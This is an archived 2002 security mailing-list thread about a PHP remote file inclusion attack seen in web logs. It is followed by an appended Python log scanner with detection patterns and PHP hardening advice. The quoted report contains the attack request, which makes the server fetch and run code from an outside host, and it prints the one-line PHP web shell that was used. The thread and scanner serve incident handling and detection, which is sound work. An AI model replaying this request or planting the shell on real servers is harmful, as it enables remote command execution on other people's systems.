Re: Good practicle php attack example

From: Harald Finnaas (mailingsat_private)
Date: Tue Sep 17 2002 - 22:17:19 PDT


    I noticed the same attack 9/16. It originated from 200.165.31.202.
    
    Regards,
    Harald
    
    ----- Original Message -----
    From: "zeno" <bugtraqat_private>
    To: <webppsecat_private>
    Cc: <incidentsat_private>
    Sent: Tuesday, September 17, 2002 8:12 PM
    Subject: Good practicle php attack example
    
    
    > I figured a few people may find this interesting.
    >
    > 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
    >
    > contents of www.jtecx.hpg.com.br/jtec.txt
    >
    > ------------------- start snip
    >
    > <?php
    > system($cmd);
    > ?>
    >
    > ------------------- end snip
    >
    > He is attempting to include code from site B into site A and have it execute the code locally.
    > You can see he is issuing it commands via a query "&cmd=uname%20-a;id".
    >
    >
    > Anyone else have any good examples of these types of attacks? Real life experiences, etc...
    >
    >
    > - zenoat_private
    >
    >
    > FULL PACKET DUMP BELOW
    >
    >
    >
    > 0x0000: 00 A0 24 91 0E C2 00 01 97 DB C8 00 08 00 45 00  ..$...........E.
    > 0x0010: 02 36 C6 13 40 00 25 06 58 54 C8 98 50 16 C7 7D  .6..@.%.XT..P..}
    > 0x0020: 55 2E 08 57 00 50 BA AF F1 7E C9 CF A9 D0 50 18  U..W.P...~....P.
    > 0x0030: E4 20 9A 2D 00 00 47 45 54 20 2F 69 6E 64 65 78  . .-..GET /index
    > 0x0040: 2E 70 68 70 3F 66 69 6C 65 3D 68 74 74 70 3A 2F  .php?file=http:/
    > 0x0050: 2F 77 77 77 2E 6A 74 65 63 78 2E 68 70 67 2E 63  /www.jtecx.hpg.c
    > 0x0060: 6F 6D 2E 62 72 2F 6A 74 65 63 2E 74 78 74 26 63  om.br/jtec.txt&c
    > 0x0070: 6D 64 3D 75 6E 61 6D 65 20 2D 61 3B 69 64 20 64  md=uname -a;id d
    > 0x0080: 20 48 54 54 50 2F 31 2E 30 0D 0A 41 63 63 65 70   HTTP/1.0..Accep
    > 0x0090: 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 6D  t: image/gif, im
    > 0x00A0: 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 69  age/x-xbitmap, i
    > 0x00B0: 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 65  mage/jpeg, image
    > 0x00C0: 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 74  /pjpeg, applicat
    > 0x00D0: 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 6C  ion/vnd.ms-excel
    > 0x00E0: 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E  , application/vn
    > 0x00F0: 64 2E 6D 73 2D 70 6F 77 65 72 70 6F 69 6E 74 2C  d.ms-powerpoint,
    > 0x0100: 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D 73 77   application/msw
    > 0x0110: 6F 72 64 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 74  ord, */*..Accept
    > 0x0120: 2D 4C 61 6E 67 75 61 67 65 3A 20 70 74 20 2D 62  -Language: pt -b
    > 0x0130: 72 0D 0A 41 63 63 65 70 74 2D 20 45 6E 63 6F 64  r..Accept- Encod
    > 0x0140: 69 6E 67 3A 20 67 7A 69 70 20 2C 20 64 65 66 6C  ing: gzip , defl
    > 0x0150: 61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A  ate..User-Agent:
    > 0x0160: 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F   Mozilla/4.0 (co
    > 0x0170: 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36  mpatible; MSIE 6
    > 0x0180: 2E 30 3B 20 57 69 6E 64 6F 77 73 20 39 38 3B 20  .0; Windows 98;
    > 0x0190: 51 33 31 32 34 36 31 29 0D 0A 56 69 61 3A 20 31  Q312461)..Via: 1
    > 0x01A0: 2E 31 20 66 77 2D 61 73 73 2E 70 72 75 64 65 2E  .1 fw-ass.prude.
    > 0x01B0: 6E 65 74 3A 38 30 38 30 20 28 53 71 75 69 64 2F  net:8080 (Squid/
    > 0x01C0: 32 2E 34 2E 53 54 41 42 4C 45 36 29 0D 0A 58 2D  2.4.STABLE6)..X-
    > 0x01D0: 46 6F 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 32  Forwarded-For: 2
    > 0x01E0: 30 30 2E 31 35 32 2E 38 33 2E 31 39 39 0D 0A 48  00.152.83.199..H
    > 0x01F0: 6F 73 74 3A 20 77 77 77 2E 63 67 69 73 65 63 75  ost: www.cgisecu
    > 0x0200: 72 69 74 79 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D  rity.com..Cache-
    > 0x0210: 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 67 65  Control: max-age
    > 0x0220: 3D 33 30 30 30 30 30 30 0D 0A 43 6F 6E 6E 65 63  =3000000..Connec
    > 0x0230: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65  tion: keep-alive
    > 0x0240: 0D 0A 0D 0A                                      ....
    >
    >
    >
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    >
    
    
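The request quoted in the thread is the classic remote file inclusion pattern: a `file=` parameter that the vulnerable script hands straight to include(), with the fetched payload taking its command from a second parameter. The following is an added example, not code from this thread or from any of its posters: a small Python scanner that reads Apache combined-format access log lines and flags the indicators visible in that request, namely a parameter value that is itself a URL, a `../` traversal segment, and shell metacharacters such as `;` inside a value. The log lines are constructed for the example; the first reproduces the request zeno posted, the rest are benign or variant traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format. The first reproduces
# the request quoted in the thread; the others are benign or variant traffic.
SAMPLE_LOG = """\
200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
10.0.0.5 - - [14/Sep/2002:16:48:01 -0400] "GET /index.php?file=about HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
10.0.0.6 - - [14/Sep/2002:16:49:10 -0400] "GET /index.php?file=https%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512 "-" "curl/7.9"
10.0.0.7 - - [14/Sep/2002:16:50:00 -0400] "GET /index.php?file=../../etc/passwd HTTP/1.0" 200 512 "-" "-"
"""

# Apache "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)  # value is a URL: remote include
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')                    # a ".." path segment
SHELL_META_RE = re.compile(r'[;|`$]')                            # command separators / substitution


def parse_query(target):
    """Split a request target into its path and decoded (name, value) pairs.

    Splits on '&' only: parse_qs on older Pythons also split on ';', which
    would have hidden the ';id' inside the cmd value of the quoted request.
    """
    path, sep, query = target.partition('?')
    params = []
    if sep:
        for part in query.split('&'):
            if not part:
                continue
            name, _, value = part.partition('=')
            params.append((unquote_plus(name), unquote_plus(value)))
    return path, params


def classify_value(value):
    """Return the list of indicator kinds present in one decoded parameter value."""
    kinds = []
    if REMOTE_URL_RE.match(value):
        kinds.append('remote_include')
    if TRAVERSAL_RE.search(value):
        kinds.append('path_traversal')
    if SHELL_META_RE.search(value):
        kinds.append('shell_metachar')
    return kinds


def scan_line(line):
    """Parse one log line; return a record with per-parameter findings, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m['target'])
    findings = [
        {'param': name, 'kind': kind, 'value': value}
        for name, value in params
        for kind in classify_value(value)
    ]
    return {'ip': m['ip'], 'ts': m['ts'], 'path': path,
            'status': m['status'], 'findings': findings}


def scan_log(text):
    """Return only the parsed records that carry at least one finding."""
    records = (scan_line(line) for line in text.splitlines() if line.strip())
    return [r for r in records if r and r['findings']]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        for f in hit['findings']:
            print(f"{hit['ts']} {hit['ip']} {hit['path']} param={f['param']} "
                  f"{f['kind']}: {f['value']!r}")
```

To use it on a real log, pass the file contents to scan_log(). A URL in a parameter value is the strongest of the three signals, since there is almost no legitimate reason for a script that takes a file name to receive one; the metacharacter check is noisier and is best read alongside it, as in the quoted request where `cmd` only matters because `file` points at a remote script. On the PHP side, the fix the thread implies is never to pass a request parameter to include(): map the parameter onto a fixed allowlist of local files, and disable allow_url_fopen (later PHP versions added the separate allow_url_include directive) so include() cannot fetch over HTTP at all.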



    This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 16:47:59 PDT